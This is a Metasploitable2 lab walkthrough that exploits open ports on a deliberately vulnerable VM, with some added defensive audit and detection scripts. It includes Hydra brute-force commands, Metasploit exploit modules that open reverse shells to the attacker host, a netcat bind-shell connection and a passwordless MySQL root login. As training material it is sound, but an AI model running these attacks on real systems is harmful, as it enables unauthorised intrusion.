# Metasploitable2

Today I will be exploiting open ports on Metasploitable2. There are a total of 30 vulnerabilities on this machine, but I’m not exploiting all of them in depth.

> **What is Metasploitable**? It’s an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. There are a total of 30 exploits on this machine!

## Tools: <a href="#id-50dc" id="id-50dc"></a>

* Kali Linux
* VMware or VirtualBox
* Vulnhub Download: [Metasploitable 2](https://sourceforge.net/projects/metasploitable/)

Let’s Begin!

## **21 | FTP** <a href="#id-3592" id="id-3592"></a>

> FTP means “File Transfer Protocol” and refers to a group of rules that govern how computers transfer files from one system to another over the internet.

<figure><img src="https://miro.medium.com/v2/resize:fit:443/1*JAh6Hg7Uazezn7hGczhu7g.png" alt="" height="20" width="354"><figcaption></figcaption></figure>

There are three ways I could exploit port 21:

**1**. Log in with `anonymous` as the username and no password.

<figure><img src="https://miro.medium.com/v2/resize:fit:628/1*oJaK3cPSgGYQfcAWz-HigA.png" alt="" height="253" width="502"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:710/1*lo_t7LOn4UDIJ-fkRO281w.png" alt="" height="195" width="568"><figcaption></figcaption></figure>

**2**. Brute-force with Hydra using a custom list of usernames and passwords.

```
hydra -L /usr/share/usernames.lst -P /usr/share/userpass.lst 192.168.200.129 ftp -v
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*29JOLHF3mqlHw2W98AAprg.png" alt="" height="139" width="700"><figcaption></figcaption></figure>

Once you have found valid credentials you can log in directly.

After logging into a user account, you can get root access through privilege escalation.

**3**. Metasploit

```
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.200.129
options
exploit
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*rEZHE0D9Q7dwxiBpGYnKwA.png" alt="" height="124" width="700"><figcaption></figcaption></figure>
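As an added example (not part of the original post), the two FTP weaknesses used above can be checked from the defender's side with Python's `ftplib`: the vsftpd 2.3.4 banner that the `vsftpd_234_backdoor` module keys on, and anonymous login. The host and port passed to `audit_ftp` are assumptions.

```python
# Added audit script (not from the original post): flags a vsftpd 2.3.4 banner
# (the backdoored build) and anonymous login on an FTP service you own.
import re
from ftplib import FTP, error_perm

BACKDOORED_VSFTPD = "2.3.4"   # version string in the 220 banner of the backdoored build


def parse_vsftpd_version(banner):
    """Return the vsftpd version from a 220 banner, or None if it is not vsftpd."""
    m = re.search(r"vsFTPd\s+([\d.]+)", banner, re.IGNORECASE)
    return m.group(1) if m else None


def is_backdoored_build(banner):
    return parse_vsftpd_version(banner) == BACKDOORED_VSFTPD


def anonymous_login_allowed(host, port=21, timeout=5):
    """True if the server accepts user 'anonymous' (ftplib sends 'anonymous@' as PASS)."""
    ftp = FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        ftp.login("anonymous", "")
        ftp.quit()
        return True
    except error_perm:          # 530 Login incorrect and friends
        return False
    except OSError:             # refused, unreachable, timeout
        return False
    finally:
        ftp.close()


def audit_ftp(host, port=21):
    """Return a list of findings for the FTP service at host:port (assumed values)."""
    findings = []
    ftp = FTP()
    try:
        banner = ftp.connect(host, port, timeout=5)   # connect() returns the welcome line
    except OSError:
        return ["ftp: connection failed"]
    finally:
        ftp.close()
    if is_backdoored_build(banner):
        findings.append("vsftpd 2.3.4 banner: backdoored build, upgrade vsftpd")
    if anonymous_login_allowed(host, port):
        findings.append("anonymous login enabled: set anonymous_enable=NO in vsftpd.conf")
    return findings
```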

## **22 | SSH** <a href="#bd1d" id="bd1d"></a>

> SSH, also known as Secure Shell or Secure Socket Shell, is a network protocol that gives users, particularly system administrators, a secure way to access a computer over an unsecured network.

<figure><img src="https://miro.medium.com/v2/resize:fit:536/1*2iGxkmIO0W86JgK05sDbEA.png" alt="" height="18" width="429"><figcaption></figcaption></figure>

The two ways I exploited SSH:

1. Hydra brute force

```
hydra -L /usr/share/usernames.lst -P /usr/share/userpass.lst 192.168.200.129 ssh
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*ogDhdvQRXysFSRQlRfYXUA.png" alt="" height="176" width="700"><figcaption></figcaption></figure>

2. Msfconsole

```
msfconsole
search ssh_login
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target IP Address>
set USER_FILE <Username file Path>
set PASS_FILE <Password file Path>
options
exploit
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*AIbKzasqII_vLvJd-CdYpg.png" alt="" height="165" width="700"><figcaption></figcaption></figure>
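The password guessing done with Hydra and `ssh_login` above (and against FTP earlier) leaves a clear trail in the SSH server's auth.log. This added example (not from the original post) counts failed logins per source address over constructed log lines and notes when a success follows the guessing; the threshold of five failures is an assumption.

```python
# Added detection example (not from the original post): summarise SSH password
# guessing from OpenSSH auth.log lines. The log lines below are constructed.
import re
from collections import Counter, defaultdict

FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2")
ACCEPTED = re.compile(r"Accepted password for (?P<user>\S+) from (?P<ip>[\d.]+)")

SAMPLE_LOG = """\
Jan 10 10:00:01 metasploitable sshd[2201]: Failed password for invalid user admin from 192.168.200.128 port 50012 ssh2
Jan 10 10:00:01 metasploitable sshd[2203]: Failed password for invalid user test from 192.168.200.128 port 50013 ssh2
Jan 10 10:00:02 metasploitable sshd[2205]: Failed password for msfadmin from 192.168.200.128 port 50014 ssh2
Jan 10 10:00:02 metasploitable sshd[2207]: Failed password for msfadmin from 192.168.200.128 port 50015 ssh2
Jan 10 10:00:03 metasploitable sshd[2209]: Failed password for root from 192.168.200.128 port 50016 ssh2
Jan 10 10:00:03 metasploitable sshd[2211]: Accepted password for msfadmin from 192.168.200.128 port 50017 ssh2
Jan 10 10:05:00 metasploitable sshd[2301]: Failed password for msfadmin from 192.168.200.50 port 40001 ssh2
"""


def analyse_auth_log(lines, threshold=5):
    """Return {ip: {"failures", "users", "success_after_failures"}} for every
    source address with at least `threshold` failed password attempts."""
    failures = Counter()
    users = defaultdict(set)
    success = set()
    for line in lines:
        m = FAILED.search(line)
        if m:
            failures[m["ip"]] += 1
            users[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED.search(line)
        if m and failures[m["ip"]] > 0:     # a success only counts after prior guessing
            success.add(m["ip"])
    return {
        ip: {"failures": n, "users": sorted(users[ip]),
             "success_after_failures": ip in success}
        for ip, n in failures.items() if n >= threshold
    }


if __name__ == "__main__":
    for ip, info in analyse_auth_log(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```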

### **23 | TELNET** <a href="#a23a" id="a23a"></a>

> Telnet enables a user to manage an account or device remotely. For example, a user may telnet into the computer that hosts their website to manage their files remotely.

<figure><img src="https://miro.medium.com/v2/resize:fit:460/1*k2mxO1X6-Ou4mYobW413yw.png" alt="" height="20" width="368"><figcaption></figcaption></figure>

```
telnet 192.168.200.129
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*_jPJXudWPokq54f6GXBlOw.png" alt="" height="380" width="700"><figcaption></figcaption></figure>

## 25 | SMTP <a href="#d3fa" id="d3fa"></a>

> SMTP stands for Simple Mail Transfer Protocol, and it’s an application used by mail servers to send, receive, and/or relay outgoing mail between email senders and receivers.

<figure><img src="https://miro.medium.com/v2/resize:fit:456/1*jPBKOZydAO7YuPai4dq0BQ.png" alt="" height="16" width="365"><figcaption></figcaption></figure>

Port 25 can be probed in two ways:

1. Netcat (or Telnet)

```
nc 192.168.200.129 25
```

<figure><img src="https://miro.medium.com/v2/resize:fit:750/1*rCuUw4jm46FPjFzhXQ4EQg.png" alt="" height="104" width="600"><figcaption></figcaption></figure>

[For SMTP Commands](http://www.tcpipguide.com/free/t_SMTPCommands-2.htm)

2. Msfconsole

```
msfconsole
search smtp_version
use auxiliary/scanner/smtp/smtp_version
set RHOSTS 192.168.200.129
options
exploit
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*OrgKyk_jy4UUEF6Z6b758A.png" alt="" height="76" width="700"><figcaption></figcaption></figure>

## 139, 445 | NetBIOS-ssn / Samba <a href="#id-97c6" id="id-97c6"></a>

> NetBIOS is a protocol to connect two computers to transmit heavy data traffic. It is mostly used for printer and file services over a network.
>
> *Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.*

<figure><img src="https://miro.medium.com/v2/resize:fit:609/1*9F1HQbBpj899M42l27j7zQ.png" alt="" height="70" width="487"><figcaption></figcaption></figure>

```
msfconsole
search samba
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.200.129
set LHOST 192.168.200.128
set LPORT 4444
options
exploit
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*bi3m473JiJRJgKzsqGMyeg.png" alt="" height="92" width="700"><figcaption></figcaption></figure>
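The `usermap_script` module above abuses Samba's `username map script` setting, which hands a client-supplied username to a shell. This added example (not from the original post) parses a constructed smb.conf, flags that setting, and shows the static `username map` file that replaces it; the file paths in the config are assumptions.

```python
# Added config audit (not from the original post): find the "username map script"
# option in smb.conf. Both configs below are constructed.

WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   username map script = /etc/samba/scripts/mapusers.sh
   security = user
[tmp]
   path = /tmp
   writeable = yes
"""

# Hardened variant: a static map file is consulted, no shell is ever involved.
FIXED_SMB_CONF = WEAK_SMB_CONF.replace(
    "   username map script = /etc/samba/scripts/mapusers.sh\n",
    "   username map = /etc/samba/smbusers\n")


def parse_smb_conf(text):
    """Return {section: {key: value}} for a Samba-style INI file (# and ; comments)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return a list of findings; empty when the risky option is absent."""
    conf = parse_smb_conf(text)
    findings = []
    for section, opts in conf.items():
        if "username map script" in opts:
            findings.append(
                f"[{section}]: 'username map script' = {opts['username map script']!r} "
                "runs a shell with a client-chosen username; replace it with a static "
                "'username map' file and keep Samba patched")
    return findings
```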

## 1099 | JAVA-rmi <a href="#id-6652" id="id-6652"></a>

> Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.

<figure><img src="https://miro.medium.com/v2/resize:fit:596/1*4-m-2rW_bf--bgx33hRWZg.png" alt="" height="19" width="477"><figcaption></figcaption></figure>

Exploiting Java-rmi with Metasploit

```
msfconsole
search java_rmi
use exploit/multi/misc/java_rmi_server
set RHOSTS 192.168.200.129
options
exploit
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*O5tAck-Y3ytnEXJcTRUALQ.png" alt="" height="171" width="700"><figcaption></figcaption></figure>

## 1524 | Bindshell <a href="#id-8380" id="id-8380"></a>

> Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.

<figure><img src="https://miro.medium.com/v2/resize:fit:593/1*h3gZRtZk4vmAvecWH3Rt3g.png" alt="" height="21" width="474"><figcaption></figcaption></figure>

It is a root shell, so we can connect to it with netcat.

```
nc 192.168.200.129 1524
```

<figure><img src="https://miro.medium.com/v2/resize:fit:761/1*bQzl36JQkpID73iNqZjJ6w.png" alt="" height="83" width="609"><figcaption></figcaption></figure>
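A bind shell such as the one on port 1524 is visible on the host itself as a listening socket owned by a shell or netcat-style process. This added example (not from the original post) parses constructed `ss -ltnp` output and flags such listeners; the set of shell-like process names is an assumption.

```python
# Added detection example (not from the original post): flag listening sockets
# owned by a shell or netcat-like process in `ss -ltnp` output (constructed).
import re

SS_OUTPUT = """\
State   Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN  0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=1012,fd=3))
LISTEN  0      32     0.0.0.0:21          0.0.0.0:*         users:(("vsftpd",pid=1034,fd=4))
LISTEN  0      1      0.0.0.0:1524        0.0.0.0:*         users:(("sh",pid=2210,fd=3),("inetd",pid=1001,fd=5))
LISTEN  0      5      0.0.0.0:5555        0.0.0.0:*         users:(("nc",pid=3301,fd=3))
"""

# Process names that should never own a listening socket on a server (assumed list).
SHELL_LIKE = {"sh", "bash", "dash", "nc", "ncat", "netcat", "socat"}

LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+(?P<proc>users:.*)?$")
PROC = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Yield (port, local address, [(process name, pid), ...]) per LISTEN line."""
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        procs = [(name, int(pid)) for name, pid in PROC.findall(m["proc"] or "")]
        yield int(m["port"]), m["addr"], procs


def find_bind_shells(text):
    """Return listeners whose owning process looks like a shell or netcat."""
    hits = []
    for port, addr, procs in parse_ss(text):
        suspicious = [(n, p) for n, p in procs if n in SHELL_LIKE]
        if suspicious:
            hits.append({"port": port, "addr": addr, "procs": suspicious})
    return hits


if __name__ == "__main__":
    for hit in find_bind_shells(SS_OUTPUT):
        print(f"port {hit['port']} on {hit['addr']} owned by {hit['procs']}")
```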

## 2121 | ProFTPD <a href="#id-285d" id="id-285d"></a>

> ProFTPD is an FTP server written for use on Unix and Unix-like operating systems.

<figure><img src="https://miro.medium.com/v2/resize:fit:470/1*PZk7tlAmU1h0ivBRxeyWpw.png" alt="" height="18" width="376"><figcaption></figcaption></figure>

This requires a login, so let's use the msfadmin credentials that we found on the webpage.

```
telnet 192.168.200.129 2121
```

<figure><img src="https://miro.medium.com/v2/resize:fit:814/1*Mv1ALaaFJqbspip6PBZ9XQ.png" alt="" height="232" width="651"><figcaption></figcaption></figure>

## 3306 | MYSQL <a href="#id-00cb" id="id-00cb"></a>

> MySQL is a database management system.
>
> To add, access, and process data stored in a computer database, you need a database management system such as MySQL Server.

<figure><img src="https://miro.medium.com/v2/1*3neCgehZx7kNbtHlkdIEGw.png" alt="" width="700"><figcaption></figcaption></figure>

Exploiting MySQL with Metasploit

```
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.200.129
options
exploit
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*4LEGtUDu8mymwjSYXoNsTQ.png" alt="" height="131" width="700"><figcaption></figcaption></figure>

Found the user ‘root’. Time to log in to MySQL:

```
mysql -u root -h 192.168.200.129
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*rE8jwxxrXVKK0GPgK4EQgg.png" alt="" height="403" width="700"><figcaption></figcaption></figure>

## 5432 | PostgreSQL <a href="#id-0a0b" id="id-0a0b"></a>

> PostgreSQL is used as the primary data store or data warehouse for many web, mobile, geospatial, and analytics applications.

<figure><img src="https://miro.medium.com/v2/resize:fit:623/1*CWmscesDgcrQsZlkIWbc6w.png" alt="" height="16" width="498"><figcaption></figcaption></figure>

Exploiting PostgreSQL with Msfconsole

```
search postgres_payload
use exploit/linux/postgres/postgres_payload
show options
set RHOSTS 192.168.200.129
set LHOST 192.168.200.128
exploit
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*M167QmeMwQgbqJ0wJSIYGw.png" alt="" height="223" width="700"><figcaption></figcaption></figure>

After logging into Postgres, you can get root access through privilege escalation.

